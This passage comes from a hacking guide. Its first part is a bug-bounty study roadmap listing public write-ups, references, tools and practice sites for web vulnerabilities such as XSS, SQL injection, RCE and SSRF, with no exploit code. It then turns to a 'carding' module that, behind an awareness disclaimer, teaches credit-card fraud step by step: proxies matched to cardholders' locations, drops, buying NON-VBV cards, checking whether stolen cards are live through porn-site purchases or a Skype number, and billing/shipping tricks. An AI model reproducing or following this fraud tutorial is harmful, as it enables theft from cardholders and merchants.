Stored XSS in Google Docs (Bug Bounty) by Harry M Gertos Stored XSS on developer.uber.com via admin account compromise in Uber by James Kettle (albinowax) Yahoo Mail stored XSS by Klikki Oy Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) by Masato Kinugawa Youtube XSS by fransrosen Best Google XSS again – by Krzysztof Kotowicz IE & Edge URL parsin Problem – by detectify Google XSS subdomain Clickjacking

SQL Injection SQL injection, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. References to read:    

https://www.owasp.org/index.php/SQL_Injection https://portswigger.net/web-security/sql-injection https://www.imperva.com/learn/application-security/sql-injection-sqli/ https://www.w3schools.com/sql/sql_injection.asp

Some POCs:      

SQL Injection Vulnerability nutanix by Muhammad Khizer Javed Yahoo – Root Access SQL Injection – tw.yahoo.com by Brett Buerhaus Multiple vulnerabilities in a WordPress plugin at drive.uber.com by Abood Nour (syndr0me) GitHub Enterprise SQL Injection by Orange SQL injection in WordPress Plugin Huge IT Video Gallery in Uber by glc SQL Injection on sctrack.email.uber.com.cn by Orange Tsai

Remote Code Execution (RCE) In RCE an attacker’s able to execute arbitrary commands or code on a target machine or in a target Machine. References to read:  

https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/ https://en.wikipedia.org/wiki/Arbitrary_code_execution

Some POCs:        

How we broke PHP, hacked Pornhub and earned $20,000 by Ruslan Habalov RCE deal to tricky file upload by secgeek WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic by Cure53 (cure53) Read-Only user can execute arbitraty shell commands on AirOS by 93c08539 (93c08539) Remote Code Execution by impage upload! by Raz0r (ru_raz0r) Popping a shell on the Oculus developer portal by Bitquark Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit – 10,000$ by 5haked PayPal Node.js code injection (RCE) by Michael Stepankin 82 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER                          

eBay PHP Parameter Injection lead to RCE Yahoo Acqusition RCE Command Injection Vulnerability in Hostinger by @alberto__segura RCE in Airbnb by Ruby Injection by buerRCE RCE in Imgur by Command Line RCE in git.imgur.com by abusing out dated software by Orange Tsai RCE in Disclosure Remote Code Execution by struct2 Yahoo Server Command Injection in Yahoo Acquisition Paypal RCE $50k RCE in JetBrains IDE $20k RCE in Jenkin Instance by @nahamsec JDWP Remote Code Execution in PayPal by Milan A Solanki XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook’s servers by Reginaldo Silva How I Hacked Facebook, and Found Someone’s Backdoor Script by Orange Tsai How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! by Orange Tsai uber.com may RCE by Flask Jinja2 Template Injection by Orange Tsai Yahoo Bug Bounty – *.login.yahoo.com Remote Code Execution by Orange Tsai (in Chinese) Google App Engine RCE by Ezequiel Pereira Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition) by NaHamSec Exploting ImageMagick to get RCE on HackerOne by c666a323be94d57 Trello bug bounty: Access server’s files using ImageTragick by Florian Courtial 40k fb rce Yahoo Bleed 1 Yahoo Bleed 2 Microsoft Apache Solr RCE Velocity Template By Muhammad Khizer Javed

Insecure Direct Object Reference (IDOR) In IDOR an application provides direct access to objects based on the user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly. References to read:  

https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-largebounty-rewards/ https://www.secjuice.com/idor-insecure-direct-object-reference-definition/

Some POCs:    

DOB disclosed using “Facebook Graph API Reverse Engineering” by Raja Sekar Durairaj Change the description of a video without publish_actions permission in Facebook by phwd Response To Request Injection (RTRI) by ?, be honest, thanks to this article, I have found quite a few bugs because of using his method, respect to the author! Leak of all project names and all user names , even across applications on Harvest by Edgar Boda-Majer (eboda) 83 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER                            

Changing paymentProfileUuid when booking a trip allows free rides at Uber by Matthew Temmy (temmyscript) View private tweet Uber Enum UUID Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User by Stephen Sclafani Hacking Facebook’s Legacy API, Part 2: Stealing User Sessions by Stephen Sclafani Delete FB Video Delete FB Video Facebook Page Takeover by Manipulating the Parameter by arunsureshkumar Viewing private Airbnb Messages IDOR tweet as any user by kedrisec Classic IDOR endpoints in Twitter Mass Assignment, Response to Request Injection, Admin Escalation by sean Trello bug bounty: The websocket receives data when a public company creates a team visible board by Florian Courtial Trello bug bounty: Payments informations are sent to the webhook when a team changes its visibility by Florian Courtial Change any user’s password in Uber by mongo Vulnerability in Youtube allowed moving comments from any video to another by secgeekTwitter Vulnerability Could Credit Cards from Any Twitter Account by secgeek One Vulnerability allowed deleting comments of any user in all Yahoo sites by secgeek Microsoft-careers.com Remote Password Reset by Yaaser Ali How I could change your eBay password by Yaaser Ali Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication by Duo Labs Hacking Facebook.com/thanks Posting on behalf of your friends! by Anand Prakash How I got access to millions of [redacted] accounts All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description by Enguerran Gillier (opnsec) Urgent: attacker can access every data source on Bime by Jobert Abma (jobert) Downloading password protected / restricted videos on Vimeo by Gazza (gazza) Get organization info base on uuid in Uber by Severus (severus) How I Exposed your Primary Facebook Email Address (Bug worth $4500) by Roy Castillo

Unrestricted File Upload As in name unrestricted file upload allows user to upload malicious file to a system to further exploit to for Code execution References to read:   

https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/unrestricted-file-upload/ https://www.owasp.org/index.php/Unrestricted_File_Upload https://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation/

84 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Some POCs:    

File Upload XSS in image uploading of App in mopub by vijay kumar RCE deal to tricky file upload by secgeek File Upload XSS in image uploading of App in mopub in Twitter by vijay kumar (vijay_kumar1110) Unrestricted File Upload to RCE by Muhammad Khizer Javed

XML External Entity Attack (XXE) XXE is an attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. References to read:   

https://portswigger.net/web-security/xxe https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet https://phonexicum.github.io/infosec/xxe.html

Some POCs:     

XXE through SAML XXE in Uber to read local files XXE by SVG in community.lithium.com How we got read access on Google’s production servers by detectify Blind OOB XXE At UBER 26+ Domains Hacked by Raghav Bisht

Local File Inclusion (LFI) The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. References to read:  

https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/ https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

Some POCs:       

SSRF to LFI Disclosure Local File Inclusion by Symlink Facebook Symlink Local File Inclusion Gitlab Symlink Local File Inclusion Gitlab Symlink Local File Inclusion Part II Multiple Company LFI LFI by video conversion, excited about this trick!

85 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Subdomain Takeover A process of registering a non-existing domain name to gain control over another domain. References to read:   

https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/ https://0xpatrik.com/subdomain-takeover-basics/ https://github.com/EdOverflow/can-i-take-over-xyz

Some POCs:       

Hijacking tons of Instapage expired users Domains & Subdomains by geekboy Reading Emails in Uber Subdomains Slack Bug Journey – by David Vieira-Kurz Subdomain takeover and chain it to perform authentication bypass by Arne Swinnen UBER Wildcard Subdomain Takeover by Muhammad Khizer Javed Lamborghini Subdomain Takeover Through Expired Cloudfront Distribution by Muhammad Khizer Javed Subdomain Takeover via Unsecured S3 Bucket Connected to the Website by Muhammad khizer Javed

Server Side Request Forgery (SSRF) by SSRF the attacker can abuse functionality on the server to read or update internal resources. References to read:   

https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-129d034c27978 https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/ https://blog.detectify.com/2019/01/10/what-is-server-side-request-forgery-ssrf/

Some POCs:         

ESEA Server-Side Request Forgery and Querying AWS Meta Data by Brett Buerhaus SSRF to pivot internal network SSRF to LFI SSRF to query google internal server SSRF by using third party Open redirect by Brett BUERHAUS SSRF tips from BugBountyHQ of Images SSRF to RCE XXE at Twitter Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface

86 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Some Other Interesting POCs: A huge collection at https://github.com/djadmin/awesome-bug-bounty Deserialization    

Java Deserialization in manager.paypal.com by Michael Stepankin Instagram’s Million Dollar Bug by Wesley Wineberg (Ruby Cookie Deserialization RCE on facebooksearch.algolia.com by Michiel Prins (michiel) Java deserialization by meals

Race Condition  

Race conditions on Facebook, DigitalOcean and others (fixed) by Josip Franjković Race Conditions in Popular reports feature in HackerOne by Fábio Pires (shmoo)

Business Logic Flaw      

Facebook simple technical hack to see the timeline by Ashish Padelkar How I Could Steal Money from Instagram, Google and Microsoft by Arne Swinnen How I could have removed all your Facebook notes Facebook – bypass ads account’s roles vulnerability 2015 by POUYA DARABI Uber Ride for Free by anand praka Uber Eat for Free by

Authentication Bypass        

OneLogin authentication bypass on WordPress sites via XMLRPC in Uber by Jouko Pynnönen (jouko) 2FA PayPal Bypass by henryhoggard SAML Bug in Github worth 15000 Authentication bypass on Airbnb via OAuth tokens theft Uber Login CSRF + Open Redirect -> Account Takeover at Uber [http://c0rni3sm.blogspot.hk/2017/08/accidentally-typo-to-bypass.html?m=1](Administrative Panel Access) by c0rni3sm Uber Bug Bounty: Gaining Access To An Internal Chat System by mishre User Account Takeover via Signup by Muhammad Khizer Javed

HTTP Header Injection    

Twitter Overflow Trilogy in Twitter by filedescriptor Twitter CRLF by filedescriptor Adblock Plus and (a little) more in Google $10k host header by Ezequiel Pereira

87 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Email Related      

This domain is my domain – G Suite A record vulnerability I got emails – G Suite Vulnerability How I snooped into your private Slack messages [Slack Bug bounty worth $2,500] Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000] Slack Yammer Takeover by using TicketTrick by Inti De Ceukelaire How I could have mass uploaded from every Flickr account!

Money Stealing 

Round error issue -> produce money for free in Bitcoin Site by 4lemon

Others                             

Payment Flaw in Yahoo Bypassing Google Email Domain Check to Deliver Spam Email on Google’s Behalf When Server Side Request Forgery combine with Cross Site Scripting SAML Pen Test Good Paper A list of FB writeup collected by phwd by phwd NoSQL Injection by websecurify CORS in action CORS in Fb messenger Web App Methodologies XXE Cheatsheet The road to hell is paved with SAML Assertions, Microsoft Vulnerability Study this if you like to learn Mongo SQL Injection by cirw Mongo DB Injection again by websecrify w3af speech about modern vulnerability by w3af Web cache attack that lead to account takeover A talk to teach you how to use SAML Raider XSS Checklist when you have no idea how to exploit the bug CTF write up, Great for Bug Bounty It turns out every site uses jquery mobile with Open Redirect is vulnerable to XSS by sirdarckcat Bypass CSP by using google-analytics Payment Issue with Paypal Browser Exploitation in Chinese XSS bypass filter Markup Impropose Sanitization Breaking XSS mitigations via Script Gadget X41 Browser Security White Paper Improper Input Validation | Add Custom Text and URLs In SMS send by Snapchat By Muhammad Khizer Javed Exploiting Insecure Firebase Database! By Muhammad Khizer Javed Using Inspect Element to Bypass Security restrictions By Muhammad Khizer Javed

88 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Information Disclosure    

Hacking SMS API Service Provider of a Company |Android App Static Security Analysis By Muhammad Khizer Javed Vine User Private information disclosure The feature works as intended, but what’s in the source? By zseano How Our Co-Founder Earned $10.6K in just 10 Hours By Tensecure Systems

So these were some common issues that one should get a grip on and learn more and more about Following is a list of some Attacks Topics that You Should do some research and read the Blogs/reports on them.                                  

SQL Injection Attack Hibernate Query Language Injection Direct OS Code Injection XML Entity Injection Broken Authentication and Session Management Cross-Site Scripting (XSS) Insecure Direct Object References Missing Function Level Access Control Cross-Site Request Forgery (CSRF) Using Components with Known Vulnerabilities Unvalidated Redirects and Forwards ClickJacking Attacks DNS Cache Poisoning Symlinking Remote Code Execution Attacks Remote File inclusion Local file inclusion Denial oF Service Attack PHPwn NAT Pinning XSHM HTTP Parameter Pollution Tabnabbing LDAP injection Log Injection Path Traversal Reflected DOM Injection Repudiation Attack Resource Injection Server-Side Includes (SSI) Injection Session fixation Session hijacking attack Session Prediction Setting Manipulation 89 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER    

Special Element Injection SMTP injection Traffic flood XPATH Injection

BLOGS! You should read. Lets get towards Blogs! There are plenty of blogs Shared by Hackers on daily basis that you can read to learn more and more…                                   

https://blog.it-securityguard.com/ https://blog.innerht.ml/ http://brutelogic.com.br/blog/ https://klikki.fi/ http://philippeharewood.com/ https://seanmelia.wordpress.com/ https://respectxss.blogspot.com/ https://www.gracefulsecurity.com/ https://whitton.io/ https://tisiphone.net/ http://archive.nahamsec.com/ https://www.hackerscreed.org/ http://danlec.com/blog https://wehackpeople.tumblr.com/ https://bitquark.co.uk/blog/ https://www.arneswinnen.net/ http://bugbountypoc.com/ https://medium.com/@arbazhussain/ http://www.shawarkhan.com/ https://blog.detectify.com/ http://www.rafayhackingarticles.net https://forum.bugcrowd.com/ https://securitywall.co/ https://www.hackerone.com/blog http://www.securitytube.net/ https://hackasia.org/ http://www.gangte.net/ https://mukarramkhalid.com/ https://securitytraning.com/ https://jubaeralnaziwhitehat.wordpress.com http://hackaday.com/ http://www.securityfocus.com/ https://packetstormsecurity.com/ http://www.blackhat.com/ https://www.metasploit.com/ 90 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER          

http://sectools.org/ https://labs.detectify.com/ https://blog.rubidus.com/ http://www.securityidiots.com/ https://hackernoon.com/ https://sqli-basic.blogspot.com/ https://bugbaba.blogspot.in/ https://vulnerability-lab.com/ https://medium.com/@know.0nix/ https://medium.com/@codingkarma/

These are some Of the Websites That I like to Visit regularly to be updated and Read Their Articles………. Another advice…… Regularly follow http://h1.nobbd.de/ to b updated with HackerOne Public Bug reports You can learn alot from them Alternatively, You can Join Slack Community for Hackers  

https://bugbounty-world.slack.com/ https://bugbountyforum.com/

Tools! You should try out.                       

dnscan https://github.com/rbsec/dnscan Knockpy https://github.com/guelfoweb/knock Sublist3r https://github.com/aboul3la/Sublist3r massdns https://github.com/blechschmidt/massdns nmap https://nmap.org masscan https://github.com/robertdavidgraham/masscan EyeWitness https://github.com/ChrisTruncer/EyeWitness DirBuster https://sourceforge.net/projects/dirbuster/ dirsearch https://github.com/maurosoria/dirsearch Gitrob https://github.com/michenriksen/gitrob git-secrets https://github.com/awslabs/git-secrets sandcastle https://github.com/yasinS/sandcastle bucket_finder https://digi.ninja/projects/bucket_finder.php GoogD0rker https://github.com/ZephrFish/GoogD0rker/ Wayback Machine https://web.archive.org waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 Sn1per https://github.com/1N3/Sn1per/ XRay https://github.com/evilsocket/xray wfuzz https://github.com/xmendez/wfuzz/ patator https://github.com/lanjelot/patator datasploit https://github.com/DataSploit/datasploit hydra https://github.com/vanhauser-thc/thc-hydra changeme https://github.com/ztgrace/changeme 91 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER                          

MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/ Apktool https://github.com/iBotPeaches/Apktool dex2jar https://sourceforge.net/projects/dex2jar/ sqlmap http://sqlmap.org/ oxml_xxe https://github.com/BuffaloWill/oxml_xxe/ XXE Injector https://github.com/enjoiz/XXEinjector The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool Playing with JSON Web Tokens for Fun and Profit ground-control https://github.com/jobertabma/ground-control ssrfDetector https://github.com/JacobReynolds/ssrfDetector LFISuit https://github.com/D35m0nd142/LFISuite GitTools https://github.com/internetwache/GitTools dvcs-ripper https://github.com/kost/dvcs-ripper tko-subs https://github.com/anshumanbh/tko-subs HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer Race the Web https://github.com/insp3ctre/race-the-web ysoserial https://github.com/GoSecure/ysoserial PHPGGC https://github.com/ambionics/phpggc CORStest https://github.com/RUB-NDS/CORStest retire-js https://github.com/RetireJS/retire.js getsploit https://github.com/vulnersCom/getsploit Findsploit https://github.com/1N3/Findsploit bfac https://github.com/mazen160/bfac WPScan https://wpscan.org/ CMSMap https://github.com/Dionach/CMSmap Amass https://github.com/OWASP/Amass

This was as much as I can think about sharing with you guys related to Web app Security in tools and vulns i have added a few things about mobile apps but the following sections contain some references you should definitely go through if you gonna join the mobile app security gang as well. Mobile Application Security. So hello to Mobile App Security section now let me clear this first i’m a complete noob at this section so it won’t be as detailed as the web app one. Now The best and the very first thing I would suggest is to actually learn about the development phase of an app mainly my focus is Android APPs ( doesn’t necessarily mean that you should go for learning to develop an android but at least get to know. For this, You can go through the following Android App development tools. (My suggestion is you should actually give basic time to these) Android SDK ~ The Android software development kit (SDK) includes a comprehensive set of development tools. These include a debugger, libraries, a handset emulator based on QEMU, documentation, sample code, and tutorials ADT Bundle ~ The Android Developer Tools(ADT) bundle is a single download that contains everything for developers to start creating Android Application 92 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Root Tools ~ RootTools provides rooted developers with a standardized set of tools for use in the development of rooted applications. Now if you have gone through them let’s get towards Mobile app security vulnerabilities For this I’ll suggest you first go towards OWASP Mobile Top 10 Giving them a good overview will definitely worth it. I’ll also Highly suggest these two Books specifically for Android & IOS app testing  

The Mobile Application Hacker’s Handbook iOS Application Security: The Definitive Guide for Hackers and Developers

For Mobile Applications, I’ll share Two of the Best places I’m currently following to learn and I would highly recommend you guys to have a look at them and giving them a proper read will definitely help you Application Security Wiki: Application Security Wiki is an initiative to provide all Application security-related resources to Security Researchers and developers in one place. 

https://appsecwiki.com/

Learn IOS Security:  

IOS Security Guide to learn and test by Prateek http://damnvulnerableiosapp.com/#learn

owasp-workshop-android-pentest: 

Learning Penetration Testing of Android Applications

Mobile Application Penetration Testing Cheat Sheets   

The Mobile App Pentest cheat sheet Mobile penetration testing android command cheatsheet Getting Started in Android Apps Pen-testing

Summing up Phase #02 of this section I think by following these resources at and giving them good time one can get pretty good at Bug Hunting. Here are some Websites or Places where you can play CTF Challenges and practice the skills that you have learned.         

Hacker 101 https://ctf.hacker101.com/ Hack the box https://www.hackthebox.eu/ OvertheWire wargames http://overthewire.org/wargames/ Pwnable.tw https://pwnable.tw/ Vulnhub https://www.vulnhub.com/ Troy Hunt “Hack Yourself First” https://hack-yourself-first.com/ Hack.Me https://hack.me/ Hacksplaining https://www.hacksplaining.com/lessons Penetration Testing Practice Labs https://www.amanhardikar.com/mindmaps/Practice.html 93 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER I hope the Path Guide i’m trying to share here clears doubts for many newcomers in Bug Bounty Hunting. Let’s move to Phase #03

PHASE #03

Phase 03 is All about Selecting a target, getting started to test and after finishing testing writing a good report about the issue you have found. Hey so Now the Final Phase I have in my mind is for People who have gone through all the good important stuff and now are testing.. so I’ll like to give my advice about a few things and then will sum up this blog. Selecting and Approaching a Target? One of the most important things in Bug bounty Hunting is to Select a target that you’re going to test. This basically depends on one’s mood, experience, and skills one can take a look at a target with a huge scope having 4-5 websites will all subdomains in-scope and a few mobile apps and test start testing them or just one domain & one app with a good app having a lot of features to test. One can go to https://bugcrowd.com/programs or https://hackerone.com/directoryand look for a program accordingly or either individual programs like Google, Facebook, or eBay. Approaching a target to Hunt is an easy task you just need to be careful with what you’re doing it all depends on you.. for me, I usually do recon at first by going through domain history, links, IPs, & Wayback Info of the site. Don’t forget to keep notes of everything you do, now basically after the basic recon process that I used tools and stuff for or somethings have to done manual. I start hunting, I take a particular functionality/workflow in the application and start digging deep into it. I do look for low hanging fruits or surface bugs. There is no point focussing your efforts on those but keeping track of them is really helpful. I Observe this workflow/requests via a proxy tool such as Burp or Zap. Burp is actually the only tool I use for web or android app pentesting I mainly. Create multiple accounts because I want to test the functions being sent from one user to another. If you haven’t been provided multiple accounts, ask for it. To date, I have not been refused a second account whenever I have asked for it. or sometimes create them easily. Just work with the app flow and keep testing look for weird behaviors of the app try changing things in them but remember finding an app working weirdly isn’t necessarily means you have found a bug worth reporting but I would suggest you to keep digging and try to actually find a basic security impact of that… then I usually go for major listed security vulnerabilities I use the methods to achieve them nothing much special just all depends on an app you can’t find a PHP code injection in a static web lol so that’s why I usually give good time on learning the web flow. for this, I go got reading API docs and stuff. After spending a few hours on this stuff, if I can’t get anything on a particular point of the app I usually stop and move on. Getting hung up on something is the biggest motivation killer but that doesn’t mean I gave up. I do get back to it later if something else comes up. That’s why I always make notes and save them for later use. That’s basically all I do lol looks basic and easy but for me, it’s hell time spent…

94 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Reporting a Vulnerability? So I’ll say after all this effort you have put into learning, practicing, & actually successfully finding a vulnerability, writing a report will be one of the most difficult tasks. Because one mistake can make the team reviewing them annoyed or maybe increases their workflow. For me writing a simple but effective report with proper headings and giving as many details as possible with POC images or videos can actually make your work fun and the teams work easy. To write a report I follow these guides.   

WRITING SUCCESSFUL BUG SUBMISSIONS – BUG BOUNTY HUNTER METHODOLOGY Writing a good and detailed vulnerability report What does a good report look like?

Well, I guess this is where I’ll end this section and I hope these resources I’m sharing here help answer the questions I basically get in my DMs about teaching them. I myself is a learner right now and learning is a huge part of my life also, I consider myself a beginner, and sharing this is basically a way for me to learn more. As Mentioned before this Guide is basically for people who are absolutely new or are still looking for a proper way about what to learn first and from where.

ENDING NOTE! Being a security researcher, it is really tough to keep yourself up to date. I’d ask the beginners to focus on self-study and learn things by themselves as everything is possible all you need is the passion of taking a step after that you can achieve anything. Nothing is impossible to achieve. All I achieved was by doing self-study and self-motivation and without any certifications and I’m still learning and trying my best to share what I can so others can also learn something. YOU ARE NEVER A PERFECT PERSON, BUT YOU ARE STILL BETTER THAN THE REST OF THE PEOPLE.

For a Bug Bounty Hunter & Cybersecurity Researcher, all it takes is the passion to achieve something.

95 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

MODULE 04: ALL ABOUT CARDING

96 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER If you were a victim of carding fraud or really want to understand what is Carding, Bin and how it should be done then here I prepared the document which will clear the basic understanding. Points I cover:    

What is carding? What are the factors relates to carding? How it’s done, I mean process? Precautionary measures Carder should take.

Overview: Nowadays, if we see the credit card fraud trend, it is being increased day by day and new techniques being discovered to hack the credit card info and use it for malicious purposes. As everything goes cashless, the use of a credit card will be necessary for everyone. This is the reason people should be aware of how carding fraud is done and learn how to become not to become a victim. There are so many ways to get the credit card details available on the internet through Darknet sites as well as on TOR sites (Data Leak .etc.). My aim is to spread awareness about carding, what is it, how the carder does it, etc. I have referred many articles, sites and basic documentation which I feel will be useful to share it with you. I want the normal user to be aware of carding methods so they can be alert to it. As we can see on social media sites and groups, most of the carders provide the offers which are collected from Online Sites and groups for your reference: Be aware that you should never contact a ripper. A Ripper is a fraud who takes the money and never deliver the product. Offer on Facebook group -------------------- Offer on WhatsApp group

97 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

LET’S START WITH THE BASICS 1. Introduction to Carding and Key Points: There are multiple definitions available per different views. Carding itself is defined as the illegal use of the card (Credit/Debit) by unauthorized people (carder) to buy a product. For educational purposes, I will now show how a carder is able to go about their illicit activities. Remember – carding is highly illegal, and should not be attempted under any circumstances. Key points in the carding method

2. Let start to understand each point one by one. Computer (PC): For doing carding always use a computer. I know some methods using a mobile device, but it is less secure and involves more risk. SOCKS: SOCKS stands for SOCK et S ecure. It is internet protocol which allows client and server traffic pass through a proxy server, so real IP is getting hidden and proxy IP get reflected. This is useful while carding because carder wants to use the credit card holder’s location while doing it. Users can buy SOCKS. Mac Address Changer: MAC stands for Media Access Control. It is the unique address of every Network Interface Card (NIC). A MAC address changer allows you to change the MAC address of NIC instantly. It is required to be anonymous and safe CCleaner: It is very useful tool help in cleaning your browsing history, cookies, temp files, etc. Many people ignore this part and get caught, so be careful and don’t forget to use it. RDP (Remote Desktop Protocol): RDP allows one computer to connect to another computer within the network. It is protocol developed by Microsoft. Basically, carders use it to connect to computers of the geo location of the person

98 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER whose credit card carder want to use. It is used for safety and stay anon. Here carders using others’ PC for doing carding instead of their own. DROP: DROP is an address which the carder uses for the shipping address in the carding process. Let me explain in details with an example: If I am carding with US credit card, then I use USA address as shipping address then my order will be shipped successfully, and I will be safe. If you have relatives/friends, then no problem, otherwise use sites who provide drop services only we have to pay extra for shipping it. CC (Credit Card): This part is very much important so read it carefully. Any credit card it is in the following format: | Credit card Number | Exp Date| CVV2 code | Name on the Card | Address | City | State | Country | Zip code | Phone # (sometimes not included depending on where you get your credit card from)| e.g.: (randomly taken number/details) | 4305873969346315 | 05 | 2018 | 591 | UNITED STATES | John Mechanic | 201 | Stone Wayne Lane | Easternton | MA | 01949

TYPES OF CREDIT CARD Every Credit card company starts their credit card number with a unique number to identify individually like shown below    

American Express (AMEX Card) – 3xxxxxxxxxxxxxx Visa Card – 4xxxxxxxxxxxxxx Master Card – 5xxxxxxxxxxxxxx Discover (Disco) – 6xxxxxxxxxxxxxx

Visa 1. Classic: The Card is used worldwide in any locations designated by Visa, including ATMs, real and virtual Stores, and shops offering goods and services by mail and telephone. 2. Gold – This card has a higher limit capacity. Most used card and adopted worldwide. 3. Platinum – Card is having limits over $10,000. 4. Signature – No preset spending limit – great bin to get 5. Infinite – Most prestigious card with having virtually no limit. There is less in circulation so be alert when buying these. Use only with reputable sellers! 6. Business – it can be used for small to medium sized businesses, usually has a limit. 7. Corporate – it can be used with medium to large size businesses, having more limit than a Business card. 8. Black – It has limited membership. It has no limit only having $500 annual fee, high-end card. MasterCard 1. 2. 3. 4. 5.

Standard – it is same as classic visa card. Gold – it is same as visa gold card. Platinum – it is same as visa platinum card World – it has a very high limit. World Elite – it is virtually no limit, high-end card.

99 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Amex Card 1. Gold – it usually has around a 10k limit. 2. Platinum- is usually has a higher limit (around 35k). 3. Centurion – it has a High limit (75k+). It is also known as the black card, note: do not confuse with visa black card. Now we can start with some of the questionnaire and Basic concepts before start practical process of Carding. Q1. What is BIN? It is known as Bank Identification Number (BIN). It is a 6-digit number e.g.: 431408. Some of the reference sites which give BIN info which I also refer:  

https://www.bincodes.com/bin-creditcard-generator/ https://exactbins.com/bin-lookup/

Simply go to the site (https://www.bincodes.com/bin-creditcard-generator/) enter BIN number and click on find to get the details. I have added first 6 digits only.

Q2. What is the meaning of VBV, NON VBV and MSC? 

  

VBV (Verified by Visa) – Extra level protection is added by Visa to protect the Card from fraud. Like DOB, password, Social Security Number and Mother’s name, etc. also sending OTP (one-time password) as extra security level to card owner mobile number to validate the transaction. NON VBV (Verified by Visa) –Handy to use. No need extra information as specified in VBV card while doing the transaction. Note it down (IMP) - Carders mainly buy and use NON VBV cards for carding. MSC (MasterCard Secure Code) – security level same as VBV card.

Q3. What is AVS?   

It stands for Address Verification System It is the system which is used to identify the credit card holder original address with billing address provided by the user while shopping or online transaction. The system is used to identify the online fraud over the internet.

100 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Q4. How to check credit card is live or dead?    

There are many sites available on the internet to verify credit card is live or dead, but they charge for it approx. $0.001 (price may vary). Also, 80% websites kill the credit card so never use it. There are tools also available on the internet to check the credit card status, but most of them are a backdoor or Trojan so prefer not to use it. As such there is no easy method to check it. Carder uses own ways to find it out. One of the ways is… Most carder go to Porn sites, buy a membership and confirm the credit card is live and proceed with carding.

Q5. How to check the credit card is live or dead? (Skype Method)     

Login into Skype account and call on Magic number +18005xx5633 (masked). You will connect to voice mail (lady’s voice). Start by entering the credit card number, and voice mail lady will stop automatically. After that enter Expiry date of a card like 01 16 (mm: yy format). If your credit card is live then voice mail lady will speak like “Thank you for calling, we really appreciate your business, since u are a 1st-time caller we would like to connect you … blah blah” then just hang the call. But if the credit card is used and voice mail lady speak like “Ohh I’m sorry please re-enter your credit card number now” then the card is dead. You can repeat the same process as many time you want. Note: You need a good internet connection for Skype calls.

Q6. What is Bill=ship/Bill=CC/Ship=your Address?     

Kindly pay attention here as it is also the main portion in carding process. Any mistake will cancel the order and id get blocked. BILL=SHIP (Billing address: Shipping address) Take a scenario of normal online shopping scenario, when you are doing carding you will use billing address and shipping address are same. Means in both u will use your address. No need to use credit card address. Bill=Shipping address, Ship=your address When you are doing carding, you will use credit card holder address as your billing address, and shipping address will be your address. Most sites use this method.

Now we cleared basic concepts and start with the actual process of carding.

SETUP SOCKS PROXY IN FIREFOX Follow the steps      

open Firefox go to options advanced options network A pop-up will come. Select manual proxy configuration. Enter socks host: and port: e.g.: 127.0.0.1: 8888. Press ok and restart Firefox. Now you are connected to secure Socks5

Note: when you buy a socks always match with credit card holder address. If credit card holder is from California, USA then try to get SOCKS5 at least matching state, country 101 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

